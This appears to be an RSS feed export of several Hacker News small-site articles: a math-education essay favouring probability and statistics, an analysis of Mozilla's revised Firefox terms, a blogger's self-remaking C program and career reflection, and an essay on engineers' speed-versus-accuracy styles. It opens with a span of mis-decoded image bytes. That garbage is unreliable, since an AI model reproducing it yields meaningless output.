/û)z+Ý´ºÞMký®•¼½ýVúêûhŠîG[›m7��ÅŒ³#ŸÄ²¦»RЙ@Á³Bªt`8J剔ߗ®«" ÛA@³ª"¨8Jè­—0¨h‡\79N¿Â(â4²S)õ>%MŽrÌGŽCˆß؉٠×`¡vS}IãMýX²ïlK)–AÂŒÆúFlÄGIGñ?<�pj«Œf’”£EÿvÈÅFwŒ�)Ñ(óÌT±Ä,š\õ“÷Á}ŒÂäŽOgéÊn|œÓM#@yg‰Þ:'¹¡$+ÎqƘV¥°×†åa8>ZÊ>$ Iî¿Ëᩌ3ÚÆ{T”‹~P_–×q¯Ê?Ù÷Äý ŒƒÒ÷ c%f�Pþ9>›0 ? pä^ë? 7@HfÌèŠTÐ1«o€ÙhhSf�0¨0ìh?fËØŸE�™–‹`ª/&jý ÉO>ìÉ, ÷ cŒ4øA<ßg¹hÝ„áDËñÝ´Où~��ÝnŽÁ¦Í¡ÃqohóøFF;ý'ú®áÓ–úM•áÄ�Ü·I¦Ë$8œ6dñ+D•ÔÀgš#¤?]hŒœO#ç³ …

    Article truncated for RSS feed. Read the full article at https://taonexus.com/publicfiles/feb2025/skype-retirement-email-28-february-2025.png

    ]]>
    https://taonexus.com/publicfiles/feb2025/skype-retirement-email-28-february-2025.png hacker-news-small-sites-43207777 Fri, 28 Feb 2025 16:57:37 GMT
    <![CDATA[Math That Matters: The Case for Probability over Polynomials]]> thread link) | @vyrotek
    February 28, 2025 | https://anandsanwal.me/math-eduction-more-probability-statistics-less-calculus/ | archive.org

    probability over calculus - math that matters

    This essay first appeared in my newsletter. Sign up here if interested in F’ing up the status quo and fixing education.


    When I was in high school, students divided into two camps: those who “got” math and those who believed they simply weren’t “math people.” 

    I was one of the “got” math people who spent countless hours doing trigonometry and eventually doing AP Calculus where I was doing derivatives and all sorts of ‘fancy’ math. Deep down, I knew what this was really about – it wasn’t about practical skills but about signaling I was smart, just like the other high-achiever types. It wasn’t about learning. It was just another credential for the college application rat race.

    Meanwhile, some of my friends struggled with math not because they lacked ability, but because the content was so disconnected from anything they cared about. When any of us asked the teacher when we’d ever use this stuff, she gave the standard response about college preparation and developing abstract thinking skills. 

    But looking back now, I realize we were all learning the wrong math – both the students who excelled and those who gave up. It is yet another example of how schools fail teenagers.

The math most useful in real life isn’t calculus or advanced trigonometry – it’s probability and statistics. And yet our education system treats these subjects as afterthoughts, typically confined to a single elective course, usually in senior year, if taught at all.

    This is backwards.

    Consider what probability and statistics let you do: 

    • understand risk in everyday decisions
    • detect misleading claims in news articles
    • make smarter choices about money; and
    • grasp uncertainty in everything from weather forecasts to medical tests

    A teenager who understands basic probability can immediately see through the false promises of gambling apps targeting their age group. One who grasps statistical significance can better interpret health studies they encounter about supplements making grand promises about physical health. 

    These aren’t “someday you might need this” skills – they’re immediately useful.

The evidence and arguments for emphasizing probability and statistics are compelling:

    • Daniel Kahneman’s Nobel Prize-winning research reveals how humans systematically misjudge probabilities in predictable ways. His work with Amos Tversky shows that even simple statistical concepts like base rates and regression to the mean are counterintuitive to most people, leading to poor decisions in everything from medical diagnoses to financial investments. Teaching probability early could help students avoid these cognitive traps.
    • Jordan Ellenberg, in “How Not to Be Wrong,” demonstrates through dozens of examples how statistical thinking illuminates everything from lottery scams to political gerrymandering. He argues that the mathematics most useful for citizenship and everyday life isn’t calculus but the ability to reason about uncertainty and variation – skills that probability and statistics directly develop.
    • Bryan Caplan explicitly argues in “The Case Against Education” that our math curriculum teaches skills with little real-world application for most students. He points out the mismatch between the predominantly algebraic-calculus track and the actual mathematical needs of most careers and life situations, which more often involve understanding data, risk, and basic statistical concepts.
    • Arthur Benjamin, in his famous TED talk and subsequent writings, makes the case that statistics should replace calculus as the “summit” of high school mathematics. He argues that for most students, statistical literacy is far more valuable than calculus in a world increasingly driven by data and probability, yet our curriculum treats statistics as optional while pushing students toward calculus.
    • Andrew Gelman, one of today’s leading statisticians, has written extensively about restructuring mathematical education around understanding uncertainty rather than abstract proofs. He advocates for teaching statistics through simulation and real problems, suggesting that even complex statistical concepts can be made intuitive when presented in contexts that matter to students.

    To make room for more probability and statistics, we need to be willing to cut something. I’ve previously argued against Shakespeare and other subjects here.

    But if we’re focused on what to downshift on within math, the obvious candidates are topics like advanced trigonometry, detailed polynomial factoring, and calculus for non-STEM students. 

    These are precisely the topics that prompt eye rolls and “when will we use this?” questions from students – because they’re right. Most won’t use these skills unless they pursue specific technical careers.

    But teaching probability and statistics well requires more than just changing the curriculum – it requires making it engaging. Instead of abstract problems about pulling colored balls from urns, we should use real-world applications that matter to students:

• Sports Analytics: Students could analyze their fantasy sports team performance using probability distributions, calculate the true value of different player stats, or determine whether a winning streak is skill or random chance. A basketball fan might learn expected value by calculating whether a player should shoot a 3-pointer or drive for a 2 based on their shooting percentages – mathematics that suddenly matters when applied to their favorite team (a short worked sketch follows this list).
    • Social Media Content Creation: For aspiring YouTubers or TikTok creators, statistical thinking offers immediate value. Students could analyze video performance data to determine what factors correlate with higher engagement, use A/B testing to compare different title formats, or apply probability to predict which content categories have the best chance of going viral based on platform algorithm patterns.
    • Gaming Strategy: Video games provide a perfect laboratory for probability concepts. Students could calculate drop rates for rare items, optimize resource allocation in strategy games, or analyze win rates with different character builds. The mathematics of expected value directly translates to better gaming decisions, creating an immediate connection between abstract concepts and personal interests.
    • Music and Streaming Analytics: Students could examine the probability distributions of streams across different artists, analyze what makes songs trend on platforms like Spotify, or calculate the expected payout from streaming versus other revenue sources – connecting statistical thinking to their passion for music.
    • Understanding Social Dynamics: Probability helps make sense of social phenomena students experience daily. What are the chances of two people in their class sharing a birthday? How can they understand selection bias in social circles? Why do certain rumors spread faster than others? These questions make statistical concepts relevant to their immediate social world.
    • Consumer Decision-Making: Students regularly make purchasing decisions. Statistical literacy helps them analyze whether a sale is actually a good deal, understand the risk/reward of extended warranties, or calculate the expected lifetime cost of different electronics – skills they can apply immediately at the mall or online.

    When students see immediate and useful applications, the dreaded “when will we use this?” question disappears.

    The benefits of this shift would be profound. We’d graduate students better equipped to:

    • Make informed personal decisions about money, health, and risk
    • Understand scientific claims and evaluate evidence
    • Navigate an increasingly data-driven world
    • Think probabilistically about complex problems
    • Detect misleading statistics and flawed studies

    I will digress and offer one more slightly detailed and pressing reason to prioritize probability education: the explosion of sports betting among young people, particularly young men. 

    As states legalize gambling and betting apps target younger audiences, many students will encounter these platforms and never truly understand the mathematics behind them. A strong foundation in probability & mathematical reasoning would help them see through the carefully crafted illusion of easy money, understand concepts like house edge and expected value, and recognize how betting odds are strategically designed to favor the house.
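
To see how the odds favor the house, consider a standard point-spread market priced at -110 on both sides – the textbook example, not a line quoted from any particular sportsbook. A minimal Python sketch:

    def implied_probability(american_odds):
        """Convert American odds into the win probability the price implies."""
        if american_odds < 0:
            return -american_odds / (-american_odds + 100)
        return 100 / (american_odds + 100)

    # Both sides of the spread priced at -110.
    implied = [implied_probability(-110), implied_probability(-110)]
    overround = sum(implied)                    # about 1.0476, i.e. more than 100%
    house_margin = (overround - 1) / overround
    print(f"implied probabilities sum to {overround:.4f}")
    print(f"house margin: {house_margin:.1%}")  # roughly 4.5% of money wagered

The two implied probabilities sum to more than 100%; that excess is the house's cut, and a student who can compute it no longer has to take anyone's word that bettors lose in the long run.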

    Rather than simply telling students to avoid sports gambling (a strategy with limited effectiveness akin to abstinence-only sex education), we could equip them with the mathematical tools to understand why the vast majority of bettors lose money over time. This is mathematics as a form of protection against predatory industries and companies.

    Even for STEM-bound students, stronger foundations in probability and statistics would be valuable. Many cutting-edge fields like AI, genomics, and climate science rely heavily on statistical methods. A student heading into computer science is more likely to need knowledge of probabilistic algorithms than advanced calculus.

Some will object that reducing traditional mathematics could harm students’ abstract reasoning abilities. But probability and statistics develop these same skills while being more practical. TBH, “abstract reasoning” is often the catch-all reason given when teachers can’t really answer a student’s “when will I use this?” question. It’s a thoughtful-sounding way of saying “Because I told you so”. Understanding confidence intervals requires just as much abstract thinking as understanding the quadratic formula – but one has far more real-world applications than the other.

    Here’s what a reformed curriculum might look like:

    • Middle School: Basic probability concepts, data literacy, and simple statistical measures
    • 9th Grade: Core algebra with probability applications
    • 10th Grade: Geometry with data visualization and spatial statistics
    • 11th Grade: Advanced algebra with statistical inference and modeling
    • 12th Grade: Advanced statistics and data analysis (with calculus as an optional track for STEM-focused students)

    This isn’t about making math easier or less rigorous – it’s about making it more relevant. 

    The mathematical challenges of understanding probability and working with statistics are just as rigorous as traditional topics. The difference is that students can see why these challenges matter.

    The world is becoming more complex and data-driven. The ability to think probabilistically and understand statistics isn’t just useful – it’s becoming essential. We owe it to our students to teach them the mathematical tools and associated reasoning they’ll actually need to navigate this world. The sooner we make this shift, the better equipped the next generation will be to face the challenges ahead.

    Some of the brightest minds in mathematics education – from Kahneman to Gelman – have been pointing us in this direction. It’s time we listened.

    The real opportunity here isn’t just better preparing students for some abstract future. It’s about making mathematics immediately relevant to their lives today. When students analyze the statistics of their favorite games, calculate the real odds of social phenomena they care about, or use probability to understand the news they consume, math transforms from a chore into a powerful lens for seeing their world more clearly.

    A shift toward probability and statistics could make math more democratic too. Traditional math curricula often function as sorting mechanisms, separating “math people” from everyone else. Statistical thinking, with its blend of quantitative skills and real-world contexts, can be more approachable and engaging for a broader range of students. Done right, it could help more students discover that they are “math people” after all.

    Building an education system around what’s relevant now, rather than around outdated notions of what might be useful someday, isn’t lowering our standards. It’s raising them by demanding that what we teach actually matters. The cost of continuing to teach the wrong math isn’t just wasted time—it’s a missed opportunity to give students tools they could be using every day.

    ]]>
    https://anandsanwal.me/math-eduction-more-probability-statistics-less-calculus/ hacker-news-small-sites-43207626 Fri, 28 Feb 2025 16:42:50 GMT
    <![CDATA[Mozilla has better lawyers than PR]]> thread link) | @gessha
    February 28, 2025 | https://thelibre.news/mozilla-has-better-lawyers-than-pr/ | archive.org

    Niccolò Venerandi

    10 min read

    Mozilla has better lawyers than PR

    Two days ago, Mozilla introduced new terms of use and an updated privacy notice for Firefox.

    This is the reaction. What the general public took out of the new terms is, well, we should probably switch to another browser.

    I spent yesterday reading tweets and private messages all saying something to the tune of: goodbye Firefox!

    But is there any truth to this? Well, let's dive in.

    Firstly, the facts. Mozilla announced a new set of Terms of Use, which we had not had before, and an updated Privacy Notice. Let's start with the former.


    The controversial paragraph is the following, and I'm going to read it in its entirety:

    You give Mozilla all rights necessary to operate Firefox, including processing data as we describe in the Firefox Privacy Notice, as well as acting on your behalf to help you navigate the internet. When you upload or input information through Firefox, you hereby grant us a nonexclusive, royalty-free, worldwide license to use that information to help you navigate, experience, and interact with online content as you indicate with your use of Firefox.

    There are a few other problematic sections. A few paragraph below, Mozilla warns that they can now "suspend or end anyone's access to Firefox at any time for any reason", though I'd love to see them try.


    Finally, your use of Firefox now must follow a newly-created "Acceptable Use Policy". These include bans of most illegal activities (pirating, theft, violating copyrights, violating any person's privacy, harming children, and more):


    However, you also cannot "Upload, download, transmit, display, or grant access to content that includes graphic depictions of sexuality or violence", i.e., you are no longer allowed to watch, upload, or distribute pornography or anything that depicts violence.

    The rest of the Terms of Use is what you would expect: a few indemnification clauses, software is provided as is, yadda yadda.

    Now, onto the Privacy Policy. This document is quite detailed and - I believe - understandable.

    Firstly, there's a list of all data collected to make the Firefox browser work. This includes the browser settings, the password manager, customization options, and such. Your browser history is also kept locally (e.g., for autocompletion purposes), as well as web form data (so you don't have to re-write everything if the browser closes), and so on.


    There are a few advertisement clauses. If you search for location-related keywords and you have Sponsored Suggestions turned on, then you will be served advertisements related to that keyword, though they'll never link it directly to you as an individual. Firefox New Tab might also show advertising, and some technical and interaction data (how you interact with the ad) is collected and shared with partners on a de-identified or aggregated basis.


    There are also a few sections regarding that data that you might want to share with Mozilla to help them improve their browser, such as how fast pages load for you and how many ads you see – all of this is, again, de-identified or aggregated (and you can opt out).


    Nothing else catches my eye, though you might want to go check the webpage yourself.

Finally, Mozilla also updated its FAQ page to remove all mentions of Firefox not selling your data. Every place where this was stated, the statement is now gone.


    Even worse, the entire question "Does Firefox sell your data?" (to which the answer was, "no obv") was also removed.

    I believe that's all. Of course, this paints a very bleak picture for Mozilla; some of us are left wondering why all of these changes are taking place, while others don't care and are jumping ship already.

    So, let's play a game. Let's try to build the best possible defense for Mozilla and see if it's solid. If it's not, that's a pretty big issue. Let's start with the "nonexclusive, royalty-free, worldwide license" to your data. According to Mozilla,

    We need a license to allow us to make some of the basic functionality of Firefox possible. Without it, we couldn’t use information typed into Firefox, for example. It does NOT give us ownership of your data or a right to use it for anything other than what is described in the Privacy Notice.

    Brodie here dutifully points out that, no, the TOS does not give them ownership of your data, but it does grant them a license to it. However, this does not change the fact that they're still bound to their Privacy Notice, which did not allow for data usage aside from, well, operating the browser.

    Indeed, I'd like to stress that the license is "to use that information to help you navigate, experience and interact with online content as you indicate with your use of Firefox".

    The CEO of Epic Games and creator of Unreal Engine, Tim Sweeney, similarly defends Mozilla on this specific point:

    The license says that when you type stuff, the program can use the stuff you typed to do the thing you asked it to do. This is what programs ordinarily do, but nowadays lawyers tend to advise companies to say it explicitly.

    I don't hold particular sympathy towards him, but I believe he knows more than me about what the lawyers are up to these days.

    Many claimed that other browsers work just fine without this legal wording, but that's simply false.

    Google grants itself a worldwide, non-exclusive, royalty-free license to "host, reproduce, distribute, communicate, and use your content" and "modify and create derivative works" for the "limited purpose" of "operating and improving the services".


    The same applies to Edge: Microsoft grants itself a "worldwide and royalty-free intellectual property license to use Your Content, for example, to make copies of, retain, transmit, reformat, display, and distribute via communication tools Your Content on the Services".


Outliers here are Safari, Brave, and Opera, which do not currently seem to include this kind of wording.

Other software has similar clauses, too; for example, you also grant Microsoft a full license to everything you write in Word, if you use that kind of software.

    Let's assume that's why the sentence was there. But why ban pornography?

    The key here is that the Acceptable Use Policy starts with: "You may not use any of Mozilla’s services to".

    In the Terms of Service, the word "services" is defined as: Mozilla VPN, Firefox Relay, Firefox Monitor, Firefox Note, Firefox sync and Pocket. This does not seem to include Firefox.


Thus, what the Acceptable Use Policy likely asks is that you avoid anything illegal (or pornographic) when using their VPN, and maybe when saving articles to Pocket.

Out of curiosity, I checked whether NordVPN, one of the best-known VPN companies, has similar terms. It does, disallowing any illegal content, but also "threatening, stalking, harming or harassing others, or promoting bigotry or discrimination".


So maybe this can be clarified as a VPN-type of thing that does not apply to Firefox, since it's not a service. But this still does not explain why on earth they would remove the "we won't sell your data" promise from their FAQ page.

    Well, Mozilla did some damage control by adding a new question, phrased as "It seems like every company on the web is buying and selling my data. You’re probably no different.".

    This is not a question, but the answer is nonetheless very interesting:

    Mozilla doesn’t sell data about you (in the way that most people think about “selling data“), and we don’t buy data about you. Since we strive for transparency, and the LEGAL definition of “sale of data“ is extremely broad in some places, we’ve had to step back from making the definitive statements you know and love.

A few people here are speculating that the deal with Google might be at fault: since Mozilla receives money to ship Google as the default search engine, which in turn collects your data, that might be considered "selling your data" in some jurisdictions.

    That concludes the best defense of Mozilla I could put up. I would classify it as decent but not particularly compelling.

    A criticism I would like to immediately bring up, regardless of whether Mozilla is correct or not, is just how badly all of this was communicated. I'm not sure if they tried to hide these changes - like removing the "we won't sell your data" question - in the hope we wouldn't notice. Because if you knew we were going to notice, why wouldn't you immediately have an explanation ready to go? Why wait to explain yourself?

    And, even if I'm right in the distinction between services and the Firefox product, meaning I'm still allowed to watch porn… why is it so badly worded? The terms of service specifically talk about Firefox, and then there's a link to this list. Anyone would assume that it applies to what you do with the browser. Why not write more clearly?

    However, there are more direct flaws in my argument, too.

Firstly, many users are pointing out that if I merely download and operate the Firefox browser, without necessarily using any of Mozilla's services, I shouldn't need an agreement with Mozilla at all; why then would I license them my data?


This might have some explanation, such as Firefox using Mozilla's DNS, but this gets deep enough into legal speculation that I don't feel confident weighing in.

    Ultimately, everything relies on the Privacy Policy, as it's all as solid as that document is. Is it solid? Please tell me it's solid.

    Let's start with data that Mozilla shares with "partners, service providers, suppliers and contractors". If they "sell your information", it's to them.


    These partners, according to the webpage, are their search partners, such as Google, advertising partners, and a few related to Mozilla services you don't have to use (such as AI chatbots).


    To provide search functionality and advertising, the following types of data are collected: technical data, location, language preference, settings data, unique identifiers, system performance data, interaction data, and search data.


    Technical data is defined to be only about the hardware you are accessing the service from, the device type, operating system, IP address, and ISP.


    The location only refers to your country code or city, and it does not include your precise location.

    Interaction data only refers to how you engage with their services ("how many tabs you have open or what you've clicked on, click counts, impression data, attribution data, number of searches performed, time on page, ad click").

    Search data is what you search for.

    This should be everything that Mozilla can share with partners, and according to them, it only does so in a de-identified or aggregated way.

    Then, there are authorities, such as governments. If there's a valid legal process ongoing, Mozilla might have to disclose personal data to that government in response to a Notice to law enforcement.


    What kind of data? Any.


    Examples of legal processes that would make Mozilla share personal data are Emergency Requests, Court Orders, National Security Requests, Pen Register Orders, Search Warrants, Subpoenas, and Wiretap Orders.

Of course, this is not exactly a great look, but I don't think Mozilla could have done anything differently here. The safety net does not come from trusting that Mozilla will refuse to share your data with governments when asked; it comes from the fact that you don't need to use Mozilla's services in the first place, so your data can stay on-device and secure. Plus, you can build Firefox yourself so that you can trust it fully.

So, to recap: to the best of my knowledge, no, Firefox/Mozilla cannot use your data however they want, and I still consider it to be a very privacy-aware option. You can also still watch pornography - I think - just not when using their VPN. And they still don't sell your data; they just have the Google agreement they've always had. I don't think there's a reason to panic.

But there's a reason to worry. What a mess: this felt like a very rushed move. I want to give them the benefit of the doubt and assume they asked for a legal review of their previous documents, and the legal team replied with: Hey, change all of this immediately, because we've discovered flaws that might get us in court now that we're aware of them.

    Because if not, if they had time to prepare this announcement and think it through… what are they doing!?

    ]]>
    https://thelibre.news/mozilla-has-better-lawyers-than-pr/ hacker-news-small-sites-43207333 Fri, 28 Feb 2025 16:18:48 GMT
    <![CDATA[Misusing police database now over half of all cybercrime prosecutions in the UK [pdf]]]> thread link) | @luu
    February 28, 2025 | https://www.cl.cam.ac.uk/~ah793/papers/2025police.pdf | archive.org

    Unable to extract article]]>
    https://www.cl.cam.ac.uk/~ah793/papers/2025police.pdf hacker-news-small-sites-43207171 Fri, 28 Feb 2025 16:06:29 GMT
    <![CDATA[I'm starting to suspect my work is incompatible with a full-time academic job]]> thread link) | @luu
    February 28, 2025 | https://www.humprog.org/~stephen/blog/2025/02/28/#the-mess-im-in | archive.org

    Diverting trains of thought, wasting precious time

    Fri, 28 Feb 2025

    A more punny self-remaking C program

    To follow on from my previous proof-of-concept and later musings, here's another form of self-remaking C program in one file. This one involves some shell code that generates C code, to be included, using some punning a bit similar to my shell-and-Make one-filer.

    ///usr/bin/[ "$0".bin -nt "$0" ] || cc -save-temps -g "$0" -o "$0".bin <<EOSHELL || exit 1; exec "$0".bin "$@"; exit 42
    #ifdef EOSHELL
    $(
        # Here we write some shell code that outputs whatever C code we want.
        # It will be included when we do #include of stdin, below.
        # One application I have in mind is to probe a wrapped C compiler for
        # its supported options, and generate the C code that describes them,
        # where the core wrapper logic is written in C.
        echo "int myfunc(void) { return 42; }"
        # One problem is that if we put some elaborate shell code in here,
        # it gets difficult to test. Something like the following will work.
        # source <( sed -n '/^\$($/,/^)$/ p' wrapper.c | tail -n+2 | head -n-1 )
    )
    #else
    #define EOSHELL
    #endif
    EOSHELL
    // From here on we are in plain C and will never be run by the shell.
    
    #include <stdio.h>
    // Now can I include that file? YES
    #include "/dev/stdin"
    
    int main(int argc, char **argv)
    {
            printf("Hello, world! %d\n", myfunc());
            return 0;
    }
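
For the curious, here's a quick usage sketch; the filename selfremake.c is my own invention, and I'm assuming your shell falls back to interpreting shebang-less executables with sh, as most Unix shells do.

    $ chmod +x selfremake.c
    $ ./selfremake.c       # first run: no .bin yet, so the shell line invokes cc
    Hello, world! 42
    $ ./selfremake.c       # later runs: the .bin is newer, so no recompile
    Hello, world! 42

The -nt ("newer than") test on the first line is what makes this a remake rather than a rebuild-every-time: cc only runs when the source has changed since selfremake.c.bin was produced.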
    


    The mess I'm in

    [TL;DR: I'm starting to suspect my work is incompatible with holding a full-time academic job at a present-day university, at least in the UK. I plan to drop my academic duties to some part-time percentage, to make time to pursue projects I care about and for other income streams. That could be contracting, but could also be crowdfunding from supporters. A little support could free me up to do significantly more writing and programming—and thinking, more importantly. These are things I've struggled to do productively since becoming a full-time academic in August 2018, a surprisingly big change from my precariously grant-funded but fairly research-focused existence. In effect I'd like to get back fractionally closer to that old existence. Any change will not take effect until September. If you might be interested in supporting me you can (thanks!) express this either by e-mailing me or (because social things like e-mail cost energy) filling in a form. Also please do send me thoughts about what you might like to get out of such an arrangement. How much interest I get will affect my next steps.]

    I recently got around to watching Devine Lu Linvega's excellent talk from 2023's (last) Strange Loop. Afterwards, YouTube handily recommended me Joe Armstrong's keynote from 2014—also the year of my own Strange Loop talk. It was a privilege to be in the room for Joe's talk, which was called The Mess We're In and was every bit the product of Joe's inimitable and much-missed mind. I personally enjoyed it; the message in short is that over-complexity has left software in a mess. For this, Joe proposed some remedies that were likeably off-the-wall (not in a bad way at all).

    It's time to admit that I'm in a mess too. It's a little over ten years since I boldly presented one of my research goals at that 2014 conference. The reception was positive and gratifying. I still get occasional fan mail about the talk. So where's the progress on those big ideas? There's certainly some, which I could detail—now isn't the time. But frankly, there's not enough. In the past year I turned 40... in fact I'm about to turn 41 as I write this. It's time to admit I've landed a long way from the place where that bright-eyed 30-year-old would have hoped his future self to end up. And as Joe's absence reminds us, none of us is here forever.

    If not there, then where am I? In short, I'm trapped in a mediocre, mismanaged version of academia that is turning me into a mediocre and (self-)mismanaged individual. The problem is far from one-way traffic: if I were a more brilliant or at least better self-managing individual, I could no doubt have done better. But for now, it's the mess I'm in. I need to get out of it, somehow.

    Although the academic life has felt like my vocation, my current experience of it is one I find suffocating. If you care about things that matter—truth, quality, learning, reason, knowledge, people, doing useful things with our short time on this planet—you are a poor fit for what most of our so-called universities have become in the UK. Three character traits will cause particular problems: caring too much, having values and having standards.

Looking around, what I seem to observe is that whereas others can hack it, it's an atmosphere I find I am very poorly adapted to breathing. In short, far too much of my time is spent on regrettably meaningless tasks, and the incentives mostly point away from quality. I am trapped in only the bad quadrants of the Eisenhower matrix. To the extent that my mind is “in the institution”, it makes me feel pretty horrible: under-appreciated, over-measured, constantly bullshitted-to, serially misunderstood, encouraged to be a bureaucrat “system-gamer” and discouraged from both actually doing what I'm good at, and actually doing good. There is an enormous and exhausting cognitive dissonance generated by not only the stereotypical bureaucracy but also the new, non-stereotypical corporate noise, the institutionally broken attitudes to teaching and the increasingly timewasterly tendencies of [organisations claiming to be] research funders.

It's not all bad! There are still moments when it feels like my teaching is meaningful and my research time is going on things that matter. Those moments are just too few to sustain me, given the other stuff. Having been a “proper” academic for over six years, at a couple of different places, I'm past the point of believing it will get easier or that the pain will become worth the gain, or that moving to another institution would make a large improvement. (Caveat: that's scoped to institutions within my foreseeable CV-reach, and ruling out international moves, which I dabbled with but have decided against.)

If I'm not just to muddle on like this until I die or at least retire (it's scarily little time until I can claim my pension!), there's an imperative either to get out of this suffocating environment or at least to open up a vent... perhaps one large enough to crawl out of later. However, I'm not ready to Just Quit just yet. Being a citizen of the academic world is useful; I don't have to go for a metaphorical knighthood. My new plan is to focus more on basic sufficiency. I want to use my citizenship to do good. There is still some will in the machine to do good, even though the default pathways increasingly strangle such impulses; walking out would squander this meagre but still valuable capital.

    So the plan is back to opening up a vent. I expect to go part-time, to something like 0.6 or 0.7 at first, hopefully plugging some of the gap by doing a little more consulting and contracting. I already do these things a little, and being an academic itself is a bit like being self-employed already: although “within the system” and having a salary, one is still chasing funded opportunities that will buy flexibility, [time and influence] researchers, and other resources. I am fractionally swapping one system for another.

    I also hope to open a crowdfunding stream, with very modest expectations, just the vague goal of giving more of a sanctioned outlet to my overtly creative side. I enjoy writing, and a lot of what I program is essentially not for its publishable research results but for interest's sake or a sketched proof-of-concept. About 18 months ago I gave a fairly unfocused, disappointing(-to-me) talk and I was touched that a student afterwards told me not only how they had liked it but that they find my talks to have the latent concern of “finding beauty”. Without knowing exactly how my rambles evoked that response, I do know that if I can do more of that, I'll be doing something right.

That's about doing more stuff. What am I hoping to cut out? Well, obviously the part-time thing will bring a reduction in my institutional teaching and admin duties. I have to say there is uncertainty about how much relief will arise in practice, but I think it's worth doing the experiment. Something I really want to get away from is the “Poissonian peril”: randomized arrival of mutually-unaware tasks that sometimes unluckily cluster together, creating a lot of stress and a big disruption to the “keep-going” stream of important work. If I can reduce these Poissonian interruptions I think it could have an outsized impact on what I can achieve. Conversely, if I suddenly have to drop some programming or writing mid-flow and don't get back until weeks later, the stopping and restarting is very inefficient. Put differently: although context switching cannot be eliminated, swapping out to far-off long-term storage perhaps can be. This year until now has been pretty good for low-Poisson stay-in-RAM existence, thanks to my sabbatical in Canberra last semester, although the last few weeks have been hectic enough to undermine that. My tentative hope is that I can go just part-time enough for every year to be no more hectic than this one.

    For my first six months at King's, back in 2021, I had a very light load that left me a lot of time to my own devices. Looking back, mostly I spent it programming. That tells me something! I enjoy programming and I feel very sad and frustrated if I'm not doing it. I'd convinced myself that since my liballocs project was to be the centre of much of my work over at least the next 5–10 years it needed an investment of effort: to make it more accessible to students and generally anyone residing outside my head, and to overcome some technical debt that was already causing problems for getting research done. I've definitely made progress on all this, although this effort has become a victim of Hofstadter's law, and I sometimes feel I'm not reliably setting the right intermediate goals for myself (something I have often struggled with). Feeling more beholden to an interested audience could bring some useful focus here, and avoid the classic artist's trap of “you can't see it 'til it's finished!”.

    That's not the only parallel with creators. Academia for me has a strong “record label metaphor”: they give you a certain amount of backing, but in return they want you to “be a star” in a rather creativity-destroying way, because their finances depend on the income you generate. The hazards of this relationship are well-documented.

    I also have a growing pile of writing I'd like to do—literally hundreds of unfinished blog posts. I'm fortunate to have an audience that, although pretty small, is convincingly interested in what I'm doing. I'd like to create better channels for sharing thoughts and getting feedback. I must admit I am a pretty individual thinker at heart, so collaborative channels need to be constructed carefully. I'll give some thought to that over the coming months, but I'd love to hear from readers about any particular models they think would work.

    Although it might sound like I'm ramping down the education aspect of my work, I actually feel very motivated for some projects in this space. They're just, again, not ones I'm enabled or incentivised to pursue right now. I will write more about that in due course. Overall I have a total of four projects I'm hoping that my tweaked existence will help me progress, and two of them are educational. (I know, that's too many projects. One of them is “the linking book”... enough said already.)

    I should stop writing here and get this post out of the door. In summary, I'm making some changes in an attempt to achieve: a steadier, “keep-going”, less Poissonian existence; more consistent time for programming and writing best seen as creative work; greater distance between myself and the corporate-bullshit atmosphere; and aligning my support more with the model of a creative person. That's as a breathing vent for now, although possibly a future exit crawlway out of my current mess. While I've always sought to stand alone, it's not something anyone does by themselves. As Brian Wilson put it, you need a mess of help to stand alone... that's the new kind of mess I'm looking for, and I'll be humbled if anyone wants to be part of it.

    Please send me thoughts and comments if you have them! As mentioned up top, you can e-mail me but there's also a form in case that's easier.

    Also, I'll try to post something fun and technical soon, because it's been a while and (as mentioned) I have loads in the Hofstadterian almost-finished pile. I have my first vaguely Rust-flavoured piece almost ready to go....


    ]]>
    https://www.humprog.org/~stephen/blog/2025/02/28/#the-mess-im-in hacker-news-small-sites-43207153 Fri, 28 Feb 2025 16:04:59 GMT
    <![CDATA[The Software Engineer Spectrum: Speed vs. Accuracy]]> thread link) | @blah2244
    February 28, 2025 | https://benhowdle.im/software-engineer-spectrum.html | archive.org

    Introduction

    After 15 years in software engineering and engineering leadership—ranging from IC (individual contributor) roles to CTO—I've seen countless engineers thrive (or struggle) based on how well their working style aligns with the company's needs at the time. From the Ciscos and GoDaddys of the world to your favourite seed-stage startup, I've seen different engineers suit very different working environments and company stages.

    Over the years, I've spotted a pattern: all engineers exist on a spectrum between speed and accuracy.

    This spectrum isn't about skill or seniority—it's about how engineers naturally approach their work. Some lean towards speed, optimizing for fast iteration and progress, while others prioritize accuracy, ensuring long-term maintainability and scalability.

    Neither end of the spectrum is "better" than the other, but knowing where you sit—and understanding what kind of engineer your company actually needs—can be the difference between thriving in a role or feeling completely out of sync.


    The Speed vs. Accuracy Spectrum

    At one end of the spectrum, we have engineers who move fast, iterate quickly, and prioritize execution. At the other, we have engineers who optimize for correctness, long-term stability, and robustness.

    Here's how they compare:

    Attribute       | Speed-Oriented Engineers                                                   | Accuracy-Oriented Engineers
    Mindset         | "Ship it now, improve it later"                                            | "Make sure it's right before it goes live"
    Strengths       | Quick iteration, adaptability, delivering MVPs fast                        | Stability, scalability, long-term efficiency
    Challenges      | Tech debt, occasional instability, missing edge cases                      | Slow delivery, risk of over-engineering
    Best suited for | Startups, early-stage teams, hackathons                                    | Enterprise software, scaling startups, regulated industries
    Frustrated by   | Bureaucracy, slow decision-making, rigid processes, thorough review cycles | Firefighting, rushed deadlines, unclear requirements

    In reality, no one is purely one or the other—everyone exists somewhere on this scale, shifting slightly depending on experience, team culture, and career growth.

    As an aside, I've figured out that I sit somewhat more towards the speed end of the spectrum, though I still endeavour to account for the future where possible (i.e. asking myself questions like, "is this tech debt I can live with for now and revisit at a later date?"). But I love to make ideas "real" as quickly as possible: I find features and products that stay theoretical for too long frustrating and hard to progress, so I'd much rather sketch out a first iteration (a prototype, MVP, etc.) and get it in front of everyone to pick apart.


    Why This Spectrum Matters

    Not all engineering roles are the same.

    The biggest mistake I've seen—both from hiring managers and engineers themselves—is mismatching an engineer's natural working style with the company's needs.

    Let's break this down with real-world examples:

    1. The Scrappy Startup (0 → 1 Phase)

    A newly launched startup needs to move fast, validate ideas, and iterate quickly. Speed-oriented engineers thrive here because:

    • There's less red tape—no endless meetings or approval chains. You tend to wear multiple hats and can move swiftly through decisions, because there's very little review process in place.
    • The goal is often to ship an MVP, not to perfect every function.
    • Bugs or inefficiencies are acceptable trade-offs for momentum. A product that people love that has quirks is far more valuable than perfect code that no-one wants.

    A startup filled with accuracy-first engineers can struggle in this phase. If every decision requires a debate about scalability, the company may never get a product in front of users. Dead on arrival.
